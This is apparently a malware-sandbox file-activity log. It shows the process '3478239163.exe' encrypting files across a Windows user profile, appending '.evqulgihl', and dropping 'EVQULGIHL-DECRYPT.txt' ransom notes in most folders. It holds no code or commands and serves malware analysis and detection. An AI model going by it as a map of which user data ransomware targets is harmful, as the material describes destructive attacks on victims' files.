2452 3478239163.exe C:\Users\Public\Music\Sample Music\Sleep Away.mp3.evqulgihl ––
2452 3478239163.exe C:\Users\Public\Music\Sample Music\Sleep Away.mp3 ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@www.pizcam[1].txt text
2452 3478239163.exe C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 ––
2452 3478239163.exe C:\Users\Public\Music\Sample Music\Kalimba.mp3 ––
2452 3478239163.exe C:\Users\Public\Music\Sample Music\Kalimba.mp3.evqulgihl ––
2452 3478239163.exe C:\Users\Public\Libraries\RecordedTV.library-ms.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Music\Sample Music\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Libraries\RecordedTV.library-ms ––
2452 3478239163.exe C:\Users\Public\Libraries\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Videos\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Favorites\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Downloads\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Documents\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Music\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Pictures\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms ––
2452 3478239163.exe C:\Users\admin\Pictures\newsdistance.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Pictures\sometimeswoman.png.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Saved Games\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Searches\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms ––
2452 3478239163.exe C:\Users\admin\Pictures\sometimeswoman.png ––
2452 3478239163.exe C:\Users\admin\Pictures\newsdistance.jpg ––
2452 3478239163.exe C:\Users\admin\Pictures\drugnational.png.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Pictures\listingstexas.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\ntuser.ini.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Pictures\listingstexas.jpg ––
2452 3478239163.exe C:\Users\admin\Pictures\drugnational.png ––
2452 3478239163.exe C:\Users\admin\ntuser.ini ––
2452 3478239163.exe C:\Users\admin\Links\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.evqulgihl vc
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.evqulgihl bs
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Get Windows Live.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Money.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Sports.url ––
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSNBC News.url ––
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN.url ––
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Money.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Autos.url ––
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.evqulgihl mp3
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Links for United States\USA.gov.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Favorites\Links for United States\USA.gov.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Links for United States\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Favorites\Links\Web Slice Gallery.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Links\Web Slice Gallery.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Links\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Favorites\Links\Suggested Sites.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Links\Suggested Sites.url ––
2452 3478239163.exe C:\Users\admin\Downloads\statementgolf.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Downloads\referenceport.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Downloads\referenceport.jpg ––
2452 3478239163.exe C:\Users\admin\Downloads\statementgolf.jpg ––
2452 3478239163.exe C:\Users\admin\Downloads\advertisemost.jpg.evqulgihl flc
2452 3478239163.exe C:\Users\admin\Downloads\michiganboys.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Downloads\namar.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Downloads\maccustomer.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Downloads\maccustomer.jpg ––
2452 3478239163.exe C:\Users\admin\Downloads\michiganboys.jpg ––
2452 3478239163.exe C:\Users\admin\Downloads\namar.jpg ––
2452 3478239163.exe C:\Users\admin\Documents\shoppingsuch.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Downloads\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Downloads\advertisemost.jpg ––
2452 3478239163.exe C:\Users\admin\Documents\shoppingsuch.rtf ––
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\Outlook.pst.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp ––
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\Outlook.pst ––
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst.evqulgihl pgc
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst ––
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst ––
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst ––
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\outdoorwine.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\outdoorwine.rtf ––
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2 ––
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one ––
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one ––
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Videos\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Documents\fuckingreserved.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\developingservice.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Pictures\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Music\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Documents\fuckingreserved.rtf ––
2452 3478239163.exe C:\Users\admin\Documents\developingservice.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\telthought.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\storeny.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Documents\bedmemory.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\resourceblog.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\cartamount.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\storeny.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\resourceblog.rtf ––
2452 3478239163.exe C:\Users\admin\Documents\bedmemory.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\telthought.jpg ––
2452 3478239163.exe C:\Users\admin\Documents\cartamount.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\gradepaper.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\researchgot.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\opportunityreleases.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\previoushill.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\naturaleasily.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\researchgot.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\naturaleasily.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\previoushill.jpg ––
2452 3478239163.exe C:\Users\admin\Desktop\opportunityreleases.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\degreepurchase.png.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\filepain.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\degreepurchase.png ––
2452 3478239163.exe C:\Users\admin\Desktop\gradepaper.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\filepain.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\bookget.png.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Contacts\admin.contact.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Desktop\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Desktop\bookget.png ––
2452 3478239163.exe C:\Users\admin\Contacts\admin.contact ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\WinRAR\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\WinRAR\version.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Sun\Java\Deployment\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Sun\Java\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Sun\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Contacts\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\WinRAR\version.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@belvedere-locarno[1].txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\logs\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\DataRv\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css.evqulgihl mp3
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.evqulgihl flc
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.evqulgihl bc
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.evqulgihl vc
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml ––
